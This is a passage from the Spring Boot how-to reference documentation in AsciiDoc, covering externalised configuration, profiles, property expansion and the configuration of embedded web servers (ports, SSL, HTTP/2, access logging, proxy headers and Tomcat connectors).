`+spring.main.*+` which are read before refresh begins.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)\nYou can use the `ApplicationBuilder` class to create parent\/child `ApplicationContext` hierarchies.\nSee \"`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`\" in the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a Non-web Application\nNot all Spring applications have to be web applications (or web services).\nIf you want to execute some code in a `main` method but also bootstrap a Spring application to set up the infrastructure to use, you can use the `SpringApplication` features of Spring Boot.\nA `SpringApplication` changes its `ApplicationContext` class, depending on whether it thinks it needs a web application or not.\nThe first thing you can do to help it is to leave server-related dependencies (e.g. servlet API) off the classpath.\nIf you cannot do that (for example, you run two applications from the same code base) then you can explicitly call `setWebApplicationType(WebApplicationType.NONE)` on your `SpringApplication` instance or set the `applicationContextClass` property (through the Java API or with external properties).\nApplication code that you want to run as your business logic can be implemented as a `CommandLineRunner` and dropped into the context as a `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties and Configuration\nThis section includes topics about setting and reading properties and configuration settings and their interaction with Spring Boot applications.\n\n\n\n[[howto-automatic-expansion]]\n=== Automatically Expand Properties at Build Time\nRather than hardcoding some properties that are also specified in your project's build configuration, you can automatically expand them by instead using the existing build configuration.\nThis is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic Property Expansion Using Maven\nYou can automatically expand properties from the Maven project by using resource filtering.\nIf you use the `spring-boot-starter-parent`, you can then refer to your Maven '`project properties`' with `@..@` placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (in other words, no filtering is applied on `src\/test\/resources`).\n\nTIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add `src\/main\/resources` directly to the classpath (for hot reloading purposes).\nDoing so circumvents the resource filtering and this feature.\nInstead, you can use the `exec:java` goal or customize the plugin's configuration.\nSee the {spring-boot-maven-plugin-docs}#getting-started[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside the `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring placeholders (such as `$\\{placeholder}`) in your configuration.\nIf that property is not set to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the Java plugin's `processResources` task to do so, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms `${..}` tokens.\nThe `${..}` style conflicts with Spring's own property placeholder mechanism.\nTo use Spring property placeholders together with automatic expansion, escape the Spring property placeholders as follows: `\\${..}`.\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of SpringApplication\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as you create the application to modify its behavior.\nAlternatively, you can externalize the configuration by setting properties in `+spring.main.*+`.\nFor example, in `application.properties`, you might have the following settings:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.main.web-application-type=none\n\tspring.main.banner-mode=off\n----\n\nThen the Spring Boot banner is not printed on startup, and the application is not starting an embedded web server.\n\nProperties defined in external configuration override the values specified with the Java API, with the notable exception of the sources used to create the `ApplicationContext`.\nConsider the following application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nNow consider the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application _now_ shows the banner (as overridden by configuration) and uses three sources for the `ApplicationContext` (in the following order): `demo.MyApp`, `com.acme.Config`, and `com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the Location of External Properties of an Application\nBy default, properties from different sources are added to the Spring `Environment` in a defined order (see \"`<<spring-boot-features.adoc#boot-features-external-config>>`\" in the '`Spring Boot features`' section for the exact order).\n\nYou can also provide the following System properties (or environment variables) to change the behavior:\n\n* configprop:spring.config.name[] (configprop:spring.config.name[format=envvar]): Defaults to `application` as the root of the file name.\n* configprop:spring.config.location[] (configprop:spring.config.location[format=envvar]): The file to load (such as a classpath resource or a URL).\n A separate `Environment` property source is set up for this document and it can be overridden by system properties, environment variables, or the command line.\n\nNo matter what you set in the environment, Spring Boot always loads `application.properties` as described above.\nBy default, if YAML is used, then files with the '`.yml`' extension are also added to the list.\n\nSpring Boot logs the configuration files that are loaded at the `DEBUG` level and the candidates it has not found at `TRACE` level.\n\nSee {spring-boot-module-code}\/context\/config\/ConfigFileApplicationListener.java[`ConfigFileApplicationListener`] for more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`Short`' Command Line Arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to set configuration properties on the command line.\nYou can enable this behavior by using placeholders in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter token of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (that is, `@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style placeholders.\nIf you have enabled Maven filtering for the `application.properties` directly, you may want to also change the default filter token to use https:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other delimiters].\n\nNOTE: In this specific case, the port binding works in a PaaS environment such as Heroku or Cloud Foundry.\nIn those two platforms, the `PORT` environment variable is set automatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for External Properties\nYAML is a superset of JSON and, as such, is a convenient syntax for storing external properties in a hierarchical format, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and put it in the root of your classpath.\nThen add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already included if you use the `spring-boot-starter`).\nA YAML file is parsed to a Java `Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it is one level deep and has period-separated keys, as many people are used to with `Properties` files in Java.\n\nThe preceding example YAML corresponds to the following `application.properties` file:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driver-class-name=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee \"`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`\" in the '`Spring Boot features`' section for more information about YAML.\n\n\n\n[[howto-set-active-spring-profiles]]\n=== Set the Active Spring Profiles\nThe Spring `Environment` has an API for this, but you would normally set a System property (configprop:spring.profiles.active[]) or an OS environment variable (configprop:spring.profiles.active[format=envvar]).\nAlso, you can launch your application with a `-D` argument (remember to put it before the main class or jar archive), as follows:\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot, you can also set the active profile in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting but not by the `SpringApplicationBuilder.profiles()` method.\nThus, the latter Java API can be used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in the \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each document is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value (a comma-separated list of profiles) is fed into the Spring `Environment.acceptsProfiles()` method.\nIf any of those profiles is active, that document is included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000.\nHowever, if the Spring profile called '`development`' is active, then the port is 9001.\nIf '`production`' is active, then the port is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered.\nLater values override earlier values.\n\nTo do the same thing with properties files, you can use `application-$\\{profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and other places) into an application at runtime.\nThere is not (and technically cannot be) an exhaustive list of all supported properties in a single location, because contributions can come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows all the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties.adoc#common-application-properties, `application.properties`>> example with a list of the most common properties supported by Spring Boot.\nThe definitive list comes from searching the source code for `@ConfigurationProperties` and `@Value` annotations as well as the occasional use of `Binder`.\nFor more about the exact ordering of loading properties, see \"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\nEach Spring Boot web application includes an embedded web server.\nThis feature leads to a number of how-to questions, including how to change the embedded server and how to configure the embedded server.\nThis section answers those questions.\n\n\n\n[[howto-use-another-web-server]]\n=== Use Another Web Server\nMany Spring Boot starters include default embedded containers.\n\n* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including `spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or `spring-boot-starter-undertow` instead.\n* For reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty by including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`, `spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.\n\nWhen switching to a different HTTP server, you need to exclude the default dependencies in addition to including the one you need.\nSpring Boot provides separate starters for HTTP servers to help make this process as easy as possible.\n\nThe following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<servlet-api.version>3.1.0<\/servlet-api.version>\n\t<\/properties>\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-web<\/artifactId>\n\t\t<exclusions>\n\t\t\t<!-- Exclude the Tomcat dependency -->\n\t\t\t<exclusion>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<!-- Use Jetty instead -->\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-jetty<\/artifactId>\n\t<\/dependency>\n----\n\nNOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow 2.0, Jetty 9.4 does not support Servlet 4.0.\n\nThe following Gradle example shows how to exclude Netty and include Undertow for Spring WebFlux:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\timplementation('org.springframework.boot:spring-boot-starter-webflux') {\n\t\t exclude group: 'org.springframework.boot', module: 'spring-boot-starter-reactor-netty'\n\t\t}\n\t\t\/\/ Use Undertow instead\n\t\timplementation 'org.springframework.boot:spring-boot-starter-undertow'\n\t\t\/\/ ...\n\t}\n----\n\nNOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so you may need to keep a dependency on Netty even when you need to include a different HTTP server.\n\n\n\n[[howto-disable-web-server]]\n=== Disabling the Web Server\nIf your classpath contains the necessary bits to start a web server, Spring Boot will automatically start it.\nTo disable this behavior configure the `WebApplicationType` in your `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.main.web-application-type=none\n----\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP Port\nIn a standalone application, the main HTTP port defaults to `8080` but can be set with configprop:server.port[] (for example, in `application.properties` or as a System property).\nThanks to relaxed binding of `Environment` values, you can also use configprop:server.port[format=envvar] (for example, as an OS environment variable).\n\nTo switch off the HTTP endpoints completely but still create a `WebApplicationContext`, use `server.port=-1` (doing so is sometimes useful for testing).\n\nFor more details, see \"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\" in the '`Spring Boot Features`' section, or the {spring-boot-autoconfigure-module-code}\/web\/ServerProperties.java[`ServerProperties`] source code.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the `ServletWebServerApplicationContext` through its `WebServer`.\nThe best way to get that and be sure that it has been initialized is to add a `@Bean` of type `ApplicationListener<ServletWebServerInitializedEvent>` and pull the container out of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can also inject the actual port into a field by using the `@LocalServerPort` annotation, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`.\nDo not try to inject the port in a regular application.\nAs we just saw, the value is set only after the container has been initialized.\nContrary to a test, application code callbacks are processed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow.\nIt can be enabled in `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be performed.\nYou can configure this behavior by setting the configprop:server.compression.min-response-size[] property.\n\nBy default, responses are compressed only if their content type is one of the following:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the configprop:server.compression.mime-types[] property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties, typically in `application.properties` or `application.yml`.\nThe following example shows setting SSL properties in `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {spring-boot-module-code}\/web\/server\/Ssl.java[`Ssl`] for details of all of the supported properties.\n\nUsing configuration such as the preceding example means the application no longer supports a plain HTTP connector at port 8080.\nSpring Boot does not support the configuration of both an HTTP connector and an HTTPS connector through `application.properties`.\nIf you want to have both, you need to configure one of them programmatically.\nWe recommend using `application.properties` to configure HTTPS, as the HTTP connector is the easier of the two to configure programmatically.\n\n\n\n[[howto-configure-http2]]\n=== Configure HTTP\/2\nYou can enable HTTP\/2 support in your Spring Boot application with the configprop:server.http2.enabled[] configuration property.\nThis support depends on the chosen web server and the application environment, since that protocol is not supported out-of-the-box by JDK8.\n\n[NOTE]\n====\nSpring Boot does not support `h2c`, the cleartext version of the HTTP\/2 protocol.\nSo you must <<howto-configure-ssl, configure SSL first>>.\n====\n\n\n\n[[howto-configure-http2-undertow]]\n==== HTTP\/2 with Undertow\nAs of Undertow 1.4.0+, HTTP\/2 is supported without any additional requirement on JDK8.\n\n\n\n[[howto-configure-http2-jetty]]\n==== HTTP\/2 with Jetty\nAs of Jetty 9.4.8, HTTP\/2 is also supported with the https:\/\/www.conscrypt.org\/[Conscrypt library].\nTo enable that support, your application needs to have two additional dependencies: `org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.\n\n\n\n[[howto-configure-http2-tomcat]]\n==== HTTP\/2 with Tomcat\nSpring Boot ships by default with Tomcat 9.0.x which supports HTTP\/2 out of the box when using JDK 9 or later.\nAlternatively, HTTP\/2 can be used on JDK 8 if the `libtcnative` library and its dependencies are installed on the host operating system.\n\nThe library directory must be made available, if not already, to the JVM library path.\nYou can do so with a JVM argument such as `-Djava.library.path=\/usr\/local\/opt\/tomcat-native\/lib`.\nMore on this in the https:\/\/tomcat.apache.org\/tomcat-9.0-doc\/apr.html[official Tomcat documentation].\n\nStarting Tomcat 9.0.x on JDK 8 without that native support logs the following error:\n\n[indent=0,subs=\"attributes\"]\n----\n\tERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the [\"https-jsse-nio-8443\"] connector that does not support ALPN.\n----\n\nThis error is not fatal, and the application still starts with HTTP\/1.1 SSL support.\n\n\n\n[[howto-configure-http2-netty]]\n==== HTTP\/2 with Reactor Netty\nThe `spring-boot-webflux-starter` is using by default Reactor Netty as a server.\nReactor Netty can be configured for HTTP\/2 using the JDK support with JDK 9 or later.\nFor JDK 8 environments, or for optimal runtime performance, this server also supports HTTP\/2 with native libraries.\nTo enable that, your application needs to have an additional dependency.\n\nSpring Boot manages the version for the `io.netty:netty-tcnative-boringssl-static` \"uber jar\", containing native libraries for all platforms.\nDevelopers can choose to import only the required dependencies using a classifier (see https:\/\/netty.io\/wiki\/forked-tomcat-native.html[the Netty official documentation]).\n\n\n\n[[howto-configure-webserver]]\n=== Configure the Web Server\nGenerally, you should first consider using one of the many available configuration keys and customize your web server by adding new entries in your `application.properties` (or `application.yml`, or environment, etc. see \"`<<howto-discover-build-in-options-for-external-properties>>`\").\nThe `server.{asterisk}` namespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`, `server.jetty.{asterisk}` and others, for server-specific features.\nSee the list of <<appendix-application-properties.adoc#common-application-properties>>.\n\nThe previous sections covered already many common use cases, such as compression, SSL or HTTP\/2.\nHowever, if a configuration key doesn't exist for your use case, you should then look at {spring-boot-module-api}\/web\/server\/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].\nYou can declare such a component and get access to the server factory relevant to your choice: you should select the variant for the chosen Server (Tomcat, Jetty, Reactor Netty, Undertow) and the chosen web stack (Servlet or Reactive).\n\nThe example below is for Tomcat with the `spring-boot-starter-web` (Servlet stack):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Component\n\tpublic class MyTomcatWebServerCustomizer\n\t\t\timplements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {\n\n\t\t@Override\n\t\tpublic void customize(TomcatServletWebServerFactory factory) {\n\t\t\t\/\/ customize the factory here\n\t\t}\n\t}\n----\n\nIn addition Spring Boot provides:\n\n[[howto-configure-webserver-customizers]]\n[cols=\"1,2,2\", options=\"header\"]\n|===\n| Server | Servlet stack | Reactive stack\n\n| Tomcat\n| `TomcatServletWebServerFactory`\n| `TomcatReactiveWebServerFactory`\n\n| Jetty\n| `JettyServletWebServerFactory`\n| `JettyReactiveWebServerFactory`\n\n| Undertow\n| `UndertowServletWebServerFactory`\n| `UndertowReactiveWebServerFactory`\n\n| Reactor\n| N\/A\n| `NettyReactiveWebServerFactory`\n|===\n\nOnce you've got access to a `WebServerFactory`, you can often add customizers to it to configure specific parts, like connectors, server resources, or the server itself - all using server-specific APIs.\n\nAs a last resort, you can also declare your own `WebServerFactory` component, which will override the one provided by Spring Boot.\nIn this case, you can't rely on configuration properties in the `server` namespace anymore.\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter, or Listener to an Application\nIn a servlet stack application, i.e. with the `spring-boot-starter-web`, there are two ways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners supported by the Servlet API to your application:\n\n* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>\n* <<howto-add-a-servlet-filter-or-listener-using-scanning>>\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter, or Listener by Using a Spring Bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must provide a `@Bean` definition for it.\nDoing so can be very useful when you want to inject configuration or dependencies.\nHowever, you must be very careful that they do not cause eager initialization of too many other beans, because they have to be installed in the container very early in the application lifecycle.\n(For example, it is not a good idea to have them depend on your `DataSource` or JPA configuration.)\nYou can work around such restrictions by initializing the beans lazily when first used instead of on initialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by adding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in addition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used.\nThis aligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please make sure to check the \"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\" section.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any `Servlet` or `Filter` beans are registered with the servlet container automatically.\nTo disable registration of a particular `Filter` or `Servlet` bean, create a registration bean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically registered with an embedded servlet container by annotating a `@Configuration` class with `@ServletComponentScan` and specifying the package(s) containing the components that you want to register.\nBy default, `@ServletComponentScan` scans from the package of the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective namespaces.\n\nFor instance, the following settings log access on Tomcat with a {tomcat-docs}\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base directory.\nBy default, the `logs` directory is a temporary directory, so you may want to fix Tomcat's base directory or use an absolute path for the logs.\nIn the preceding example, the logs are available in `my-tomcat\/logs` relative to the working directory of the application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the application.\nYou can customize this location by setting the configprop:server.undertow.accesslog.dir[] property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\",configprops]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`.\nFor more details, see {jetty-docs}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nIf your application is running behind a proxy, a load-balancer or in the cloud, the request information (like the host, port, scheme...) might change along the way.\nYour application may be running on `10.10.10.10:8080`, but HTTP clients should only see `example.org`.\n\nhttps:\/\/tools.ietf.org\/html\/rfc7239[RFC7239 \"Forwarded Headers\"] defines the `Forwarded` HTTP header; proxies can use this header to provide information about the original request.\nYou can configure your application to read those headers and automatically use that information when creating links and sending them to clients in HTTP 302 responses, JSON documents or HTML pages.\nThere are also non-standard headers, like `X-Forwarded-Host`, `X-Forwarded-Port`, `X-Forwarded-Proto`, `X-Forwarded-Ssl`, and `X-Forwarded-Prefix`.\n\nIf the proxy adds the commonly used `X-Forwarded-For` and `X-Forwarded-Proto` headers, setting `server.forward-headers-strategy` to `NATIVE` is enough to support those.\nWith this option, the Web servers themselves natively support this feature; you can check their specific documentation to learn about specific behavior.\n\nIf this is not enough, Spring Framework provides a {spring-framework-docs}\/web.html#filters-forwarded-headers[ForwardedHeaderFilter].\nYou can register it as a Servlet Filter in your application by setting `server.forward-headers-strategy` is set to `FRAMEWORK`.\n\nNOTE: If your application runs in Cloud Foundry or Heroku, the configprop:server.forward-headers-strategy[] property defaults to `NATIVE`.\nIn all other instances, it defaults to `NONE`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to carry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remoteip.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.remoteip.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal proxies that are to be trusted.\nBy default, IP addresses in `10\/8`, `192.168\/16`, `169.254\/16` and `127\/8` are trusted.\nYou can customize the valve's configuration by adding an entry to `application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remoteip.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for configuration.\nIf you use YAML, single backslashes are sufficient, and a value equivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do so in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by switching the automatic one off (to do so, set `server.forward-headers-strategy=NONE`) and adding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the `TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and HTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + keystore\n\t\t\t\t\t+ \"] or truststore: [\" + truststore + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring 